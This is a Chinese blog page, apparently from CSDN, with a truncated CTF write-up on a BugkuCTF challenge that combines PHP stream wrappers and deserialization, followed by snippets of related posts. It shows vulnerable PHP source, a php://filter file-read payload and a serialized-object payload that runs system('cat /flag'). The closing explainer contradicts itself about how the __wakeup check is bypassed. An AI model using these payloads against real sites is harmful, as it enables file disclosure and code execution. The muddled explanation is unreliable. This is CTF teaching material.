记一道集PHP伪协议&PHP反序列化综合运用的CTF

最新推荐文章于 2025-07-09 21:10:32 发布
原创 最新推荐文章于 2025-07-09 21:10:32 发布 · 4.2k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文通过一道CTF题目,详细解析了如何利用PHP伪协议php://filter和php://input来读取文件内容,以及如何通过反序列化操作触发特定函数,最终获取隐藏信息的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目:http://120.24.86.145:8006/test1/

首先拿到题目后,毫无疑问,查看一下源码

<!--  
$user = $_GET["txt"];  
$file = $_GET["file"];  
$pass = $_GET["password"];  
  
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){  
    echo "hello admin!<br>";  
    include($file); //hint.php  
}else{  
    echo "you are not admin ! ";  
}  
 -->

解读一下源码的意思:

  1. get方式传入三个参数:txt,file,password
  2. file_get_contents()函数的作用是将$user的内容读取出来,在此即为将user读取出来的内容数值与类型完全等于welcome to the bugkuctf。(三个等于号)
  3. 如果满足if条件,则打印输出"hello admin!"。并且将包含的hint.php内容显示出来

在此,可以运用两个PHP的伪协议

  • php://filter         可以进行任意文件的读取。

有关php://filter的详细了解:https://www.leavesongs.com/PENETRATION/php-filter

最低0.47元/天 解锁文章

200万优质内容无限畅学
A_Tong_Mu_1
关注
【网络安全 | CTF一次PHP序列化反序列化解题详析
等风来
08-24 5820
代码开门见山给出backdoor函数,而该函数在popko类的call方法中调用故需要运行call方法而call方法是在对象上下文中调用不可访问的方法时触发的故需要调用不可访问的方法 而恰巧destruct方法中并不存在a对象和a函数故需要运行destruct方法而destruct方法在对象被销毁时触发 如何实现对象被销毁呢? 当序列化后的语句被反序列化之后,对象会被销毁,从而触发destruct方法 所以思路就是: 在pipimi类中构造一个对象,当pipimi中的destru
PHP反序列化学习笔CTF
就是我的博客
08-26 1712
ctfphp反序列化学习
web学习05Day
taochiyudadada的博客
05-18 592
我要成为web???? welcome to bugkuctf 这个题很不错 不多说 还是大佬文章 我现在只能跟着大佬走 BUGKU welcome to bugkuctf 考点: 1 php的代码审计, 2 php伪协议, 3 php的序列化, 4 php魔术方法。 有时候php代码看不懂: php代码查询地址 一 。。代码审计完后: 1.isset — 检测变量是否已设置并且非 NULL 也就是变量有没有值(...
ctfphp反序列化,[世安杯]一道关于php反序列化漏洞的题目
weixin_36440198的博客
04-01 1089
Paste_Image.png没什么信息,因此ctrl+u查看源码:Paste_Image.png看到提示,file_get_contents()函数,联想到文件包含漏洞,因此google一波,查到Paste_Image.png查看原文因此试一试:Paste_Image.png补充一种饶过方法:由于本题:allow_url_include=On因此可以包含一个远程文件,假设你的云服务IP地址为:x...
Phar反序列化
2401_88940900的博客
07-09 1013
phar反序列化基础学习,欢迎各位师傅指导
2016xctf一道ctf题目
热门推荐
一个码农的笔记
09-22 3万+
首先是index.php: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!"; if(preg_
BugkuCTF:welcome to bugkuctf(web)
s0il的博客
04-05 996
题目描述: 查看源码: you are not the number of bugku ! <!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&am...
Bugku——welcome to bugkuctf一道练习php://filter和php://input的好题)
csu_vc的博客
10-28 9515
查看源码有提示<!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){ echo "hello admin!<br>";
php反序列化1_常见php序列化的CTF考题
书山有路勤为径,学海无涯苦作舟
11-25 1863
本质上serialize()和unserialize()在php内部的实现上是没有漏洞的,漏洞的主要产生是由于应用程序在处理对象,魔术函数以及序列化相关问题时导致的。当传给unserialize()的参数可控时,那么用户就可以注入精心构造的payload当进行反序列化的时候就有可能会触发对象中的一些魔术方法,造成意想不到的危害。__toString() 是魔术方法的一种,具体用途是当一个对象被当作字符串对待的时候,会触发这个魔术方法以下说明摘自PHP官方手册。
ctfphp序列化,CTF——Web——PHP序列化和反序列化
weixin_35126200的博客
04-01 1089
PHP 序列化和反序列化:1,序列化(串行化):是将变量转换为可保存或传输的字符串的过程;反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用。这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。常见的php系列化和反系列化方式主要有:serialize,unserialize;json_encode,json_decode在进行类的序列化时 私有属性 会加 空白...
web入门-文件包含
wo41ge的博客
11-28 3408
web78~php伪协议 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 直接payload ?file=php://filter/read=convert.base64-encode/resource=flag.php web79~Data协议 <?php if(isset($_GET['file
file_get_contents(php://input, r)实例介绍
12-18
解释不清,直接上例子index.html复制代码 代码如下:  <form action=”action.php” method=”post” >  <input type=”text” name=”userName”  id=”userName” /><br>  <input type=”text” name=”userPass”  id=”userPass” /><br>  <input type=”submit” value=”ok” /> </form>action.php复制代码 代码如下:<?php$raw_post_data = file_get_contents(‘php:
[SWPUCTF 2021 新生赛] web
qq_61768489的博客
08-07 4220
简单来说: 检测路径中是否存在%字符,并且如果%后面的两个字符是十六进制字符,就会对后面的两个字符进行url解码转化,如路径中有%2e./,则会解码为../,转换后判断是否存在../,加入路径中使用.%2e/则能绕过,导致目录穿越漏洞,因为当遍历到第一个.时,后面两个字符是%2并不是./,就不会被处理,绕过检测。没有过滤|这个符号,然后exec执行是没有回显的,这个题目是需要用linux的一个命令,”tee“将想要执行的命令写入到一个文件里面,然后再去访问这个文件,以此来执行这个命令。...
php get请求_ctf中关于php伪协议的考查
weixin_39928003的博客
11-30 557
原创:Archerx 合天智汇1php://input协议第一个例子flag.php<?php$flag = 'flag{flag_is_here}'; test1.php<?phpinclude('flag.php');$a= $_GET["a"];if(isset($a)&&(file_get_contents($a,'r'))=== 'this is tes...
BugkuCTF welcome to bugkuctf
3tu6b0rn的博客
04-22 415
查看源代码 $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")) // $user必须存在 $user为文件且读出来...
ctf系列——反序列化漏洞
超级无敌菜阿板的博客
05-26 4760
题目 http://123.206.87.240:8006/test1/ 拿到题之后先看源码 you are not the number of bugku ! <!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&a...
PHP中file_get_contents的使用方法
Jack huang的专栏
03-26 7770
$data=file_get_contents("php://input"); php://input 是个可以访问请求的原始数据的只读流。 POST 请求的情况下,最好使用 php://input 来代替 $HTTP_RAW_POST_DATA,因为它不依赖于特定的 php.ini 指令。 而且,这样的情况下 $HTTP_RAW_POST_DATA 默认没有填充, 比激活 always_p......
file_get_contents() 函数详解与使用
wangxuanyang_zer的博客
11-27 1万+
file_get_contents() 函数是 PHP 中一个功能丰富、易于使用的函数,可以用于文件操作和发起 HTTP 请求。通过深入理解该函数的使用方法,我们可以更高效地处理文件读取和远程资源获取任务。同时,使用上下文选项和其他相关函数,可以使 file_get_contents() 更加灵活和强大。在实际应用中,根据需求的不同,我们可以选择合适的方式来充分发挥其优势,提高代码的可维护性和效率。两个字 🐮 🍺 各位大佬来个三连支持一下。
php封装协议的两道题
weixin_30338481的博客
05-19 184
这几天终于刷完了自己说是要刷完的那几道题,赶紧写几篇博客录。。 1. 先看看这个网站:https://blog.youkuaiyun.com/qq_41289254/article/details/81388343 接下来直接上题: 1.http://123.206.87.240:8005/post/index.ph...
CTF PHP反序列化
最新发布
08-02
CTF比赛中,PHP反序列化漏洞是常见的考察点之一,主要围绕PHP的序列化与反序列化机制展开。当用户输入的数据被直接反序列化时,攻击者可以通过构造恶意输入来控制对象的属性,甚至触发某些危险的魔法函数(如`__wakeup`、`__destruct`、`__invoke`等),从而实现任意代码执行、文件读取等操作。 ### 序列化与反序列化机制 PHP中的`serialize()`函数用于将对象的状态转换为字符串,而`unserialize()`函数则用于将该字符串还原为对象。例如,以下代码创建了一个对象并对其进行序列化: ```php class ctfShowUser { public $username = 'x'; public $password = 'y'; public $isVip = true; } $a = new ctfShowUser(); echo urlencode(serialize($a)); // 输出:O%3A9%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A1%3A%22x%22%3Bs%3A8%3A%22password%22%3Bs%3A1%3A%22y%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D ``` 此序列化字符串表示一个名为`ctfShowUser`的对象,包含三个属性:`username`、`password`和`isVip`。通过修改这些属性,攻击者可以尝试绕过某些逻辑判断,如身份验证等。 ### 魔法函数与漏洞利用 PHP中定义了一些特殊的“魔法函数”,它们在特定操作时自动调用,例如: - `__construct()`:构造函数,在对象创建时调用; - `__destruct()`:析构函数,在对象销毁时调用; - `__wakeup()`:在反序列化时调用; - `__sleep()`:在序列化时调用; - `__invoke()`:当尝试以函数方式调用对象时触发; - `__unserialize()`:在反序列化时调用,用于自定义反序列化行为。 在实际CTF题目中,常常会结合这些魔法函数来构造攻击链。例如,下面的代码展示了如何通过`__invoke`和`eval()`函数实现任意代码执行: ```php class ctfshowvip { public $username; public $password; public $code; public function __construct($u, $p) { $this->username = $u; $this->password = $p; } public function __wakeup() { if ($this->username != '' || $this->password != '') { die('error'); } } public function __invoke() { eval($this->code); } public function __sleep() { $this->username = ''; $this->password = ''; } public function __unserialize($data) { $this->username = $data['username']; $this->password = $data['password']; $this->code = $this->username . $this->password; } public function __destruct() { if ($this->code == 0x36d) { file_put_contents($this->username, $this->password); } } } unserialize($_GET['vip']); ``` 在这个例子中,`__invoke`方法使用了`eval()`函数,这意味着如果攻击者能够控制`$code`变量,就可以执行任意PHP代码。此外,`__wakeup`函数中存在一个限制条件,即`username`和`password`必须为空,否则会触发`die('error')`。为了绕过这个限制,攻击者可以利用`__unserialize`方法,将`username`和`password`设置为空字符串,同时将`code`设置为期望执行的代码。 ### 解题方法与技巧 在CTF比赛中,解决PHP反序列化漏洞题目的关键在于理解目标类的结构和魔法函数的行为。以下是常见的解题步骤: 1. **分析源码**:查看目标类的定义,识别是否存在魔法函数及其功能。重点关注`__wakeup`、`__destruct`、`__invoke`等可能触发危险操作的函数。 2. **构造恶意对象**:根据目标类的结构,构造一个恶意的序列化字符串,使其在反序列化时能够触发特定的魔法函数,并控制其行为。 3. **绕过限制条件**:有些题目会在魔法函数中设置限制条件(如`if ($this->username != '' || $this://this->password != '') { die('error'); }`),此时需要找到绕过这些条件的方法,例如通过`__unserialize`方法重置某些属性。 4. **实现任意代码执行**:如果目标类中存在`eval()`、`system()`等函数,攻击者可以通过构造恶意输入来执行任意命令。 5. **读取flag文件**:在某些情况下,攻击者需要读取服务器上的`flag`文件。此时可以利用`file_get_contents()`、`highlight_file()`等函数来实现文件读取。 ### 示例代码 以下是一个简单的示例,展示了如何构造一个恶意序列化字符串来绕过`__wakeup`函数并执行任意代码: ```php class ctfshowvip { public $username = 'admin'; public $password = '123456'; public $code = 'system("cat /flag");'; public function __wakeup() { if ($this->username != '' || $this->password != '') { die('error'); } } public function __invoke() { eval($this->code); } } $payload = new ctfshowvip(); $serialized = serialize($payload); echo urlencode($serialized); // 输出:O%3A9%3A%22ctfshowvip%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%22admin%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22123456%22%3Bs%3A4%3A%22code%22%3Bs%3A17%3A%22system%28%22cat+%2Fflag%22%29%3B%22%3B%7D ``` 在本例中,攻击者构造了一个`ctfshowvip`对象,并设置了`username`、`password`和`code`属性。通过将`code`设置为`system("cat /flag")`,攻击者可以在反序列化时触发`__wakeup`函数,并绕过其限制条件,最终执行任意命令。 ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值